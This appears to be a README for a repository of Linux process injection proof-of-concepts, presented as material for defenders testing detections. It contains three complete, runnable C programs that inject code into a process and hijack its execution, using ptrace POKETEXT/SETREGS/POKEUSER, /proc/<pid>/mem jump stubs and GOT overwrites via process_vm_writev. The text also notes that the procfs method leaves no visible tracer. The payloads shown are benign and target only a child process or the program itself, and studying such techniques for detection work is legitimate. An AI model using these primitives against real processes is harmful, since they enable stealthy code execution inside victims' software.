Linux Process Injection: proof-of-concept implementations of various Linux process injection primitives

Linux Process Injection

This repository contains proof-of-concept implementations of various Linux process injection primitives.

This code is meant to provide simple examples of injection techniques in action, allowing defenders to understand how they work and to test detections. For the sake of simplicity and to keep the code as benign as possible, the implemented techniques don’t handle process recovery – meaning that the target process will likely crash after the injected payload finishes.

The primitives are implemented using three methods: ptrace, procfs mem (/proc/<pid>/mem), and process_vm_writev. For each of them, two types of primitives were implemented:

  • Write primitives: intended to write the code into the remote process
  • Execution primitives: intended to transfer execution to the injected code

These primitives can be combined freely to create “custom” injection variations.

The following primitives are implemented:

ptrace


  • ptrace_poketext_write

Write code into a remote process by using the ptrace PTRACE_POKETEXT request, one machine word per call.

  • ptrace_setregs_exec

Hijack the execution flow of a remote process by using the ptrace PTRACE_SETREGS request to overwrite the process's RIP register.

  • ptrace_pokeuser_exec

Hijack the execution flow of a remote process by using the ptrace PTRACE_POKEUSER request, writing the new RIP value at its offset inside the process's user area (struct user).
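
The three ptrace primitives above combined into one runnable program, as an added example that is not part of the repository: a forked child stops itself with PTRACE_TRACEME followed by SIGSTOP, the parent writes a 12-byte exit_group(42) payload over a spare function in the child's .text with PTRACE_POKETEXT, redirects RIP with either PTRACE_SETREGS or PTRACE_POKEUSER, resumes the child and checks its exit status. The payload bytes, the landing_pad function and all function names are constructed for this example; it assumes x86_64 Linux with ptrace permitted (Yama ptrace_scope 0 or 1).

```c
// Added example, not the repository's code: PTRACE_POKETEXT write primitive plus
// PTRACE_SETREGS / PTRACE_POKEUSER exec primitives. x86_64 Linux, ptrace allowed.
#define _GNU_SOURCE
#include <signal.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <sys/ptrace.h>
#include <sys/user.h>
#include <sys/wait.h>
#include <unistd.h>

/* Constructed payload: mov edi,42 ; mov eax,231 (exit_group) ; syscall */
static const uint8_t PAYLOAD[] = {
    0xbf, 0x2a, 0x00, 0x00, 0x00, 0xb8, 0xe7, 0x00, 0x00, 0x00, 0x0f, 0x05,
};

/* POKETEXT moves one machine word per request: pack bytes into little-endian
 * words, padding the tail with int3 (0xcc) so an overrun traps instead of
 * running whatever used to follow the payload. Returns the word count. */
size_t pack_words(const uint8_t *buf, size_t len, uint64_t *words, size_t max_words)
{
    size_t n = (len + 7) / 8;
    if (n > max_words) return 0;
    for (size_t i = 0; i < n; i++) {
        uint64_t w = 0;
        for (size_t b = 0; b < 8; b++) {
            size_t idx = i * 8 + b;
            w |= (uint64_t)(idx < len ? buf[idx] : 0xcc) << (8 * b);
        }
        words[i] = w;
    }
    return n;
}

/* Write primitive. Works on read-only .text: ptrace access uses FOLL_FORCE, so
 * the kernel copy-on-writes the page instead of refusing. */
int ptrace_poketext_write(pid_t pid, uintptr_t addr, const uint8_t *buf, size_t len)
{
    uint64_t words[16];
    size_t n = pack_words(buf, len, words, 16);
    if (n == 0) return -1;
    for (size_t i = 0; i < n; i++)
        if (ptrace(PTRACE_POKETEXT, pid, (void *)(addr + 8 * i), (void *)words[i]) == -1)
            return -1;
    return 0;
}

/* Exec primitive 1: read the register file, patch RIP, write it all back. */
int ptrace_setregs_exec(pid_t pid, uintptr_t rip)
{
    struct user_regs_struct regs;
    if (ptrace(PTRACE_GETREGS, pid, NULL, &regs) == -1) return -1;
    regs.rip = rip;
    return ptrace(PTRACE_SETREGS, pid, NULL, &regs) == -1 ? -1 : 0;
}

/* Exec primitive 2: poke only the RIP word of the tracee's user area. */
size_t rip_user_offset(void) { return offsetof(struct user, regs.rip); }
int ptrace_pokeuser_exec(pid_t pid, uintptr_t rip)
{
    return ptrace(PTRACE_POKEUSER, pid, (void *)rip_user_offset(), (void *)rip) == -1 ? -1 : 0;
}

/* Executable scratch space: a .text function the child never calls. fork()
 * without exec keeps it at the same address in parent and child. */
static void __attribute__((noinline, used)) landing_pad(void) { for (volatile int i = 0; i < 1000000; i++) { } }

/* Spawn a child that stops itself, inject, resume. Returns the child's exit
 * status: 42 if the hijack worked, -1 on failure or if the child crashed. */
int inject_exit42(int use_pokeuser)
{
    int status;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        ptrace(PTRACE_TRACEME, 0, NULL, NULL);
        raise(SIGSTOP);                /* signal-delivery-stop: parent takes over */
        _exit(1);                      /* not reached once RIP is redirected */
    }
    if (waitpid(pid, &status, 0) == -1 || !WIFSTOPPED(status)) return -1;
    uintptr_t target = (uintptr_t)(void *)landing_pad;
    if (ptrace_poketext_write(pid, target, PAYLOAD, sizeof PAYLOAD) == 0 &&
        (use_pokeuser ? ptrace_pokeuser_exec : ptrace_setregs_exec)(pid, target) == 0 &&
        ptrace(PTRACE_CONT, pid, NULL, NULL) == 0) {          /* sig 0: drop the SIGSTOP */
        if (waitpid(pid, &status, 0) == -1) return -1;
        return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
    }
    kill(pid, SIGKILL);
    waitpid(pid, NULL, 0);
    return -1;
}

int main(void)
{
    printf("setregs : child exit status %d\n", inject_exit42(0));
    printf("pokeuser: child exit status %d\n", inject_exit42(1));
    return 0;
}
```

Both lines should report exit status 42. As with the repository's PoCs there is no process recovery: the child is consumed by the payload, which is why the example makes the payload itself call exit_group rather than letting the child run on into corrupted state.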

procfs mem


  • procfs_proc_mem_write

Write code into a remote process by writing to its procfs mem file (/proc/<pid>/mem). Like ptrace, this path ignores page protections, so read-only code pages can be patched.

  • procfs_proc_mem_exec

Hijack the execution flow of a remote process by editing its procfs mem file. This is implemented by:

  1. Identifying the address currently held in RIP
  2. Injecting a small stub at that address that performs a JMP to the address of our payload. Alternatively, the procfs_proc_mem_write function can be used to write the payload directly at the address in RIP.
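
The two-step procedure above, as an added example rather than the repository's own code, and without any ptrace call: the child is parked with SIGSTOP, its current RIP is taken from the last field of /proc/<pid>/syscall, the payload is written into a spare .text function through /proc/<pid>/mem, and a jump stub is written at RIP before SIGCONT. Because RIP normally sits in libc, gigabytes away from the payload in the main image, a 5-byte jmp rel32 usually cannot reach it; the stub builder falls back to a 14-byte absolute jmp [rip+0] form, which is the limitation behind the "write the code directly at RIP" alternative. The payload bytes, function names and the /proc lines quoted in comments are this example's assumptions; it assumes x86_64 Linux, a same-uid child and Yama ptrace_scope 0 or 1.

```c
// Added example, not the repository's code: procfs mem write + exec primitives
// with no ptrace call. x86_64 Linux, same-uid child, Yama ptrace_scope <= 1.
#define _GNU_SOURCE
#include <fcntl.h>
#include <signal.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Constructed payload: mov edi,42 ; mov eax,231 (exit_group) ; syscall */
static const uint8_t PAYLOAD[] = {
    0xbf, 0x2a, 0x00, 0x00, 0x00, 0xb8, 0xe7, 0x00, 0x00, 0x00, 0x0f, 0x05,
};

/* Control-transfer stub from `from` to `to`. `jmp rel32` (5 bytes) reaches only
 * +/-2 GiB; RIP usually sits in libc (0x7f...) while the payload is in the main
 * image (0x55.../0x40...), so fall back to `jmp [rip+0]` + imm64 (14 bytes). */
size_t build_jmp_stub(uint64_t from, uint64_t to, uint8_t out[14])
{
    int64_t rel = (int64_t)(to - (from + 5));
    if (rel >= INT32_MIN && rel <= INT32_MAX) {
        out[0] = 0xe9;
        for (int i = 0; i < 4; i++) out[1 + i] = (uint8_t)((uint32_t)rel >> (8 * i));
        return 5;
    }
    memcpy(out, "\xff\x25\x00\x00\x00\x00", 6);              /* jmp qword [rip+0] */
    for (int i = 0; i < 8; i++) out[6 + i] = (uint8_t)(to >> (8 * i));
    return 14;
}

/* /proc/<pid>/syscall reads "nr a1..a6 sp pc", or "-1 sp pc" when the task is
 * blocked outside a syscall, or "running". The last field is the pc. */
int parse_syscall_pc(const char *line, uint64_t *pc)
{
    if (strncmp(line, "running", 7) == 0) return -1;
    const char *last = strrchr(line, ' ');
    if (!last) return -1;
    char *end;
    *pc = strtoull(last + 1, &end, 16);
    return end == last + 1 ? -1 : 0;
}

int read_remote_pc(pid_t pid, uint64_t *pc)
{
    char path[64], line[512];
    snprintf(path, sizeof path, "/proc/%d/syscall", pid);
    FILE *f = fopen(path, "r");
    if (!f) return -1;
    int rc = fgets(line, sizeof line, f) ? parse_syscall_pc(line, pc) : -1;
    fclose(f);
    return rc;
}

/* Write primitive: the file offset is the target virtual address. Like ptrace
 * this path uses FOLL_FORCE, so read-only text is copy-on-written, not refused. */
int procfs_mem_write(pid_t pid, uint64_t addr, const void *buf, size_t len)
{
    char path[64];
    snprintf(path, sizeof path, "/proc/%d/mem", pid);
    int fd = open(path, O_RDWR);
    if (fd < 0) return -1;
    ssize_t n = pwrite(fd, buf, len, (off_t)addr);
    close(fd);
    return n == (ssize_t)len ? 0 : -1;
}

/* Executable scratch space the child never calls; same address after fork(). */
static void __attribute__((noinline, used)) landing_pad(void) { for (volatile int i = 0; i < 1000000; i++) { } }

/* Child parks itself with SIGSTOP; parent writes payload and stub, then
 * SIGCONT. Returns the child's exit status: 42 on success, -1 otherwise. */
int procfs_inject_exit42(void)
{
    uint8_t stub[14];
    uint64_t pc, target = (uint64_t)(uintptr_t)landing_pad;
    int status;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) { raise(SIGSTOP); _exit(1); }
    if (waitpid(pid, &status, WUNTRACED) == -1 || !WIFSTOPPED(status)) return -1;
    if (read_remote_pc(pid, &pc) == 0 &&                                 /* step 1 */
        procfs_mem_write(pid, target, PAYLOAD, sizeof PAYLOAD) == 0 &&
        procfs_mem_write(pid, pc, stub, build_jmp_stub(pc, target, stub)) == 0) {  /* step 2 */
        kill(pid, SIGCONT);                   /* resumes at pc, i.e. at the stub */
        if (waitpid(pid, &status, 0) == -1) return -1;
        return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
    }
    kill(pid, SIGKILL);
    waitpid(pid, NULL, 0);
    return -1;
}

int main(void)
{
    printf("procfs mem: child exit status %d\n", procfs_inject_exit42());
    return 0;
}
```

The stub lands inside libc's raise() in the child only: /proc/<pid>/mem writes force a private copy of the page, so the parent's libc mapping is untouched. Reading RIP from /proc/<pid>/syscall needs the same ptrace-attach permission as the mem file, but never attaches, so no tracer shows up in the target's /proc/<pid>/status.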

process_vm_writev


  • process_vm_writev_write

Write code into a remote process by using the process_vm_writev syscall. Unlike ptrace and procfs mem, process_vm_writev honours page permissions, so the destination must be a writable memory region (the call fails with EFAULT otherwise).

  • process_vm_writev_stack_overwrite_exec

Hijack the execution flow of a remote process by overwriting a return address on its stack.

  • process_vm_writev_stack_overwrite_rop

Execute code in the remote process by overwriting its stack with a ROP chain. This method relies on hardcoded gadget addresses; adjust them to match the binaries on your machine.

  • process_vm_writev_got_overwrite_exec

Hijack the execution flow of a remote process by overwriting function pointers inside its GOT. This implementation is crude and simply overwrites the first 100 pointers. To make the method more reliable, parse the GOT and target specific functions. Note that a binary linked with full RELRO has a read-only GOT after startup, which process_vm_writev cannot modify.
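
As an added example (not the repository's code) of the "parse the GOT and target specific functions" improvement, and of the writable-region requirement noted under process_vm_writev_write: the program below walks its own dynamic relocations to find the GOT slot of getpid, reads it with process_vm_readv, and tries to redirect it to a stub with process_vm_writev. It targets the current process so that it is self-contained; pointing pid at another process of the same uid is the same pair of calls, with the ELF parsed from that process's image instead. It assumes an x86_64 dynamically linked executable; fake_getpid, got_query and the other names are constructed here.

```c
// Added example, not the repository's code: find a named import's GOT slot by
// walking the dynamic relocations, then read/write it with process_vm_readv /
// process_vm_writev. Self-targeting (pid = getpid()); x86_64 dynamic executable.
#define _GNU_SOURCE
#include <errno.h>
#include <link.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/uio.h>
#include <unistd.h>
struct got_query { const char *name; uintptr_t slot; };

/* glibc rewrites .dynamic d_ptr entries to absolute addresses at load time,
 * musl keeps link-time offsets: treat values below the load base as unrelocated. */
static uintptr_t reloc(uintptr_t base, uintptr_t p) { return p < base ? p + base : p; }

/* dl_iterate_phdr visits the main program first: parse its PT_DYNAMIC, then scan
 * .rela.plt (DT_JMPREL) and .rela.dy (DT_RELA, for -fno-plt GLOB_DAT imports). */
static int phdr_cb(struct dl_phdr_info *info, size_t size, void *arg)
{
    (void)size;
    struct got_query *q = arg;
    uintptr_t base = info->dlpi_addr;
    const ElfW(Dyn) *dyn = NULL;
    for (int i = 0; i < info->dlpi_phnum; i++)
        if (info->dlpi_phdr[i].p_type == PT_DYNAMIC)
            dyn = (const ElfW(Dyn) *)(base + info->dlpi_phdr[i].p_vaddr);
    if (!dyn) return 1;
    const ElfW(Sym) *symtab = NULL; const char *strtab = NULL;
    const ElfW(Rela) *tab[2] = { NULL, NULL }; size_t sz[2] = { 0, 0 };
    for (; dyn->d_tag != DT_NULL; dyn++) {
        switch (dyn->d_tag) {
        case DT_SYMTAB:   symtab = (const ElfW(Sym) *)reloc(base, dyn->d_un.d_ptr); break;
        case DT_STRTAB:   strtab = (const char *)reloc(base, dyn->d_un.d_ptr); break;
        case DT_JMPREL:   tab[0] = (const ElfW(Rela) *)reloc(base, dyn->d_un.d_ptr); break;
        case DT_PLTRELSZ: sz[0] = dyn->d_un.d_val; break;
        case DT_RELA:     tab[1] = (const ElfW(Rela) *)reloc(base, dyn->d_un.d_ptr); break;
        case DT_RELASZ:   sz[1] = dyn->d_un.d_val; break;
        }
    }
    if (!symtab || !strtab) return 1;
    for (int t = 0; t < 2; t++)
        for (size_t i = 0; tab[t] && i < sz[t] / sizeof(ElfW(Rela)); i++) {
            unsigned type = ELF64_R_TYPE(tab[t][i].r_info);
            if (type != R_X86_64_JUMP_SLOT && type != R_X86_64_GLOB_DAT) continue;
            const char *sym = strtab + symtab[ELF64_R_SYM(tab[t][i].r_info)].st_name;
            if (strcmp(sym, q->name) == 0) { q->slot = base + tab[t][i].r_offset; return 1; }
        }
    return 1;                              /* stop after the main program either way */
}

/* Address of the GOT slot for `name` in this process, 0 if it is not imported. */
uintptr_t find_got_slot(const char *name)
{
    struct got_query q = { name, 0 };
    dl_iterate_phdr(phdr_cb, &q);
    return q.slot;
}

/* process_vm_* move data without stopping the target. Return 0 or -errno. */
int read_remote_word(pid_t pid, uintptr_t addr, uintptr_t *out)
{
    struct iovec local = { out, sizeof *out }, remote = { (void *)addr, sizeof *out };
    return process_vm_readv(pid, &local, 1, &remote, 1, 0) == (ssize_t)sizeof *out ? 0 : -errno;
}

/* Write primitive. Honours page protections, unlike ptrace and /proc/pid/mem:
 * with full RELRO the GOT is read-only after startup and this returns -EFAULT. */
int write_remote_word(pid_t pid, uintptr_t addr, uintptr_t value)
{
    struct iovec local = { &value, sizeof value }, remote = { (void *)addr, sizeof value };
    return process_vm_writev(pid, &local, 1, &remote, 1, 0) == (ssize_t)sizeof value ? 0 : -errno;
}

static pid_t fake_getpid(void) { return 4242; }

/* Redirect getpid() through its GOT slot, verify, restore. 1 = hijack took
 * effect, -EFAULT = GOT is read-only, other negatives = lookup/read failure. */
int got_hijack_demo(void)
{
    pid_t self = getpid();                 /* also resolves the slot under lazy binding */
    uintptr_t slot = find_got_slot("getpid"), saved;
    if (!slot) return -1;
    int rc = read_remote_word(self, slot, &saved);
    if (rc != 0) return rc;
    rc = write_remote_word(self, slot, (uintptr_t)fake_getpid);
    if (rc != 0) return rc;
    int hijacked = getpid() == 4242;       /* dispatches through the patched slot */
    write_remote_word(self, slot, saved);
    return hijacked ? 1 : 0;
}

int main(void)
{
    int rc = got_hijack_demo();
    if (rc == 1) puts("GOT writable: getpid() redirected to fake_getpid, slot restored");
    else if (rc == -EFAULT) puts("EFAULT: GOT is read-only (full RELRO), write refused");
    else printf("demo failed: %d\n", rc);
    return 0;
}
```

On a binary linked with partial RELRO or lazy binding the slot is writable and getpid() returns 4242 until the slot is restored; on a full-RELRO build (-z relro -z now, the default on several distributions) the same call fails with EFAULT. That is the reason the repository's process_vm_writev variants need a writable target, while the ptrace and procfs mem primitives would still be able to patch the same slot.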

For additional information on the different techniques, please refer to this blog.

Download & Use